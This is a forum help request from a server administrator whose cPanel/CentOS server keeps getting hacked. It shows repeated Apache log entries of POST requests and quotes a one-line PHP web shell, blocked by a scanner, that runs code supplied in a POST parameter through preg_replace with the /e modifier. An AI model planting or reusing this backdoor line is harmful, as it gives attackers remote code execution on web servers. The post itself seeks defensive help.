: Server has been hacked. CXS Cleaned it up but hackers keep uploading scripts On Centos X64 / Apache / WHM / Cpanel When I look in my apache_logs I see THOUSANDS of these types of LOGS.
On Centos X64 / Apache / WHM / Cpanel
When I look in my apache_logs I see THOUSANDS of these types of LOGS. various days, always a different IP over and over and over. What are they trying to do? are they using an exploit of some sorts? I have root access so I can search for things if someone has an idea?
24.159.0.128 - - [19/May/2017:05:30:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:32:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:34:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:36:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:38:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:40:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
Also in one of their uploaded hack scripts that CXS blocked I see this
EEC4D8E4439299046B8CDB3F782<?php @preg_replace ("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
is there something I can search for or any help would be appreciated!
More posts by @Jessie594
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.